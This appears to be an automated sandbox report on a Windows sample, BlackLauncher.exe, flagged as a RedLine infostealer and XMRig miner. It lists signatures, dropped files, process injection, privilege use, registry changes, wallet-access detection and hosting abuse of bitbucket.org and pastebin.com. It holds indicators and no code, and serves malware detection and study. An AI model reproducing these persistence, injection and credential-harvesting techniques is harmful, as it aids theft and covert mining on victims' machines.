Malware Analysis Report

2025-03-15 04:58

Sample ID 240713-xq4v6atcjn
Target BlackLauncher.exe
SHA256 1d80f6a688af15e12116f444d8da85be020a3393aeaab885e4d0f8589ac23dc0
Tags
redline xmrig evasion execution infostealer miner persistence spyware upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

1d80f6a688af15e12116f444d8da85be020a3393aeaab885e4d0f8589ac23dc0

Threat Level: Known bad

The file BlackLauncher.exe was found to be: Known bad.

Malicious Activity Summary

redline xmrig evasion execution infostealer miner persistence spyware upx

RedLine

RedLine payload

xmrig

XMRig Miner payload

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

Creates new service(s)

Stops running service(s)

Blocklisted process makes network request

UPX packed file

Loads dropped DLL

Executes dropped EXE

Accesses cryptocurrency files/wallets, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Drops file in System32 directory

Launches sc.exe

Drops file in Windows directory

Unsigned PE

Modifies data under HKEY_USERS

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Checks SCSI registry key(s)

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: LoadsDriver

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-13 19:04

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-13 19:04

Reported

2024-07-13 19:07

Platform

win10-20240611-en

Max time kernel

151s

Max time network

158s

Command Line

"C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Creates new service(s)

persistence execution

Downloads MZ/PE file

Stops running service(s)

evasion execution

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\ProgramData\Update\pROUy3v.exe N/A
N/A N/A C:\ProgramData\Update\vdVaFs5.exe N/A
N/A N/A C:\ProgramData\Windows11\Updater.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\ProgramData\Update\vdVaFs5.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\MRT.exe C:\ProgramData\Update\pROUy3v.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\MRT.exe C:\ProgramData\Windows11\Updater.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4304 set thread context of 1660 N/A C:\ProgramData\Update\vdVaFs5.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 4724 set thread context of 3184 N/A C:\ProgramData\Windows11\Updater.exe C:\Windows\system32\conhost.exe
PID 4724 set thread context of 4748 N/A C:\ProgramData\Windows11\Updater.exe C:\Windows\system32\svchost.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\rescache\_merged\4183903823\2290032291.pri C:\Windows\system32\taskmgr.exe N/A
File created C:\Windows\rescache\_merged\1601268389\715946058.pri C:\Windows\system32\taskmgr.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\ProgramData\Update\pROUy3v.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\ProgramData\Update\pROUy3v.exe N/A
N/A N/A C:\ProgramData\Update\pROUy3v.exe N/A
N/A N/A C:\ProgramData\Update\pROUy3v.exe N/A
N/A N/A C:\ProgramData\Update\pROUy3v.exe N/A
N/A N/A C:\ProgramData\Update\pROUy3v.exe N/A
N/A N/A C:\ProgramData\Update\pROUy3v.exe N/A
N/A N/A C:\ProgramData\Update\pROUy3v.exe N/A
N/A N/A C:\ProgramData\Update\pROUy3v.exe N/A
N/A N/A C:\ProgramData\Update\pROUy3v.exe N/A
N/A N/A C:\ProgramData\Update\pROUy3v.exe N/A
N/A N/A C:\ProgramData\Windows11\Updater.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\ProgramData\Windows11\Updater.exe N/A
N/A N/A C:\ProgramData\Windows11\Updater.exe N/A
N/A N/A C:\ProgramData\Windows11\Updater.exe N/A
N/A N/A C:\ProgramData\Windows11\Updater.exe N/A
N/A N/A C:\ProgramData\Windows11\Updater.exe N/A
N/A N/A C:\ProgramData\Windows11\Updater.exe N/A
N/A N/A C:\ProgramData\Windows11\Updater.exe N/A
N/A N/A C:\ProgramData\Windows11\Updater.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\Update\pROUy3v.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4396 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4396 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3500 wrote to memory of 4548 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe
PID 3500 wrote to memory of 4548 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe
PID 4548 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4548 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4548 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe C:\Windows\SYSTEM32\cmd.exe
PID 4548 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe C:\Windows\SYSTEM32\cmd.exe
PID 2876 wrote to memory of 2248 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2876 wrote to memory of 2248 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4548 wrote to memory of 564 N/A C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe C:\Windows\SYSTEM32\cmd.exe
PID 4548 wrote to memory of 564 N/A C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe C:\Windows\SYSTEM32\cmd.exe
PID 564 wrote to memory of 3388 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 564 wrote to memory of 3388 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4548 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe C:\ProgramData\Update\pROUy3v.exe
PID 4548 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe C:\ProgramData\Update\pROUy3v.exe
PID 4548 wrote to memory of 4304 N/A C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe C:\ProgramData\Update\vdVaFs5.exe
PID 4548 wrote to memory of 4304 N/A C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe C:\ProgramData\Update\vdVaFs5.exe
PID 4548 wrote to memory of 4304 N/A C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe C:\ProgramData\Update\vdVaFs5.exe
PID 1760 wrote to memory of 3724 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wusa.exe
PID 1760 wrote to memory of 3724 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wusa.exe
PID 4304 wrote to memory of 1660 N/A C:\ProgramData\Update\vdVaFs5.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 4304 wrote to memory of 1660 N/A C:\ProgramData\Update\vdVaFs5.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 4304 wrote to memory of 1660 N/A C:\ProgramData\Update\vdVaFs5.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 4304 wrote to memory of 1660 N/A C:\ProgramData\Update\vdVaFs5.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 4304 wrote to memory of 1660 N/A C:\ProgramData\Update\vdVaFs5.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 4304 wrote to memory of 1660 N/A C:\ProgramData\Update\vdVaFs5.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 4304 wrote to memory of 1660 N/A C:\ProgramData\Update\vdVaFs5.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 4304 wrote to memory of 1660 N/A C:\ProgramData\Update\vdVaFs5.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 240 wrote to memory of 4624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wusa.exe
PID 240 wrote to memory of 4624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wusa.exe
PID 4724 wrote to memory of 3184 N/A C:\ProgramData\Windows11\Updater.exe C:\Windows\system32\conhost.exe
PID 4724 wrote to memory of 3184 N/A C:\ProgramData\Windows11\Updater.exe C:\Windows\system32\conhost.exe
PID 4724 wrote to memory of 3184 N/A C:\ProgramData\Windows11\Updater.exe C:\Windows\system32\conhost.exe
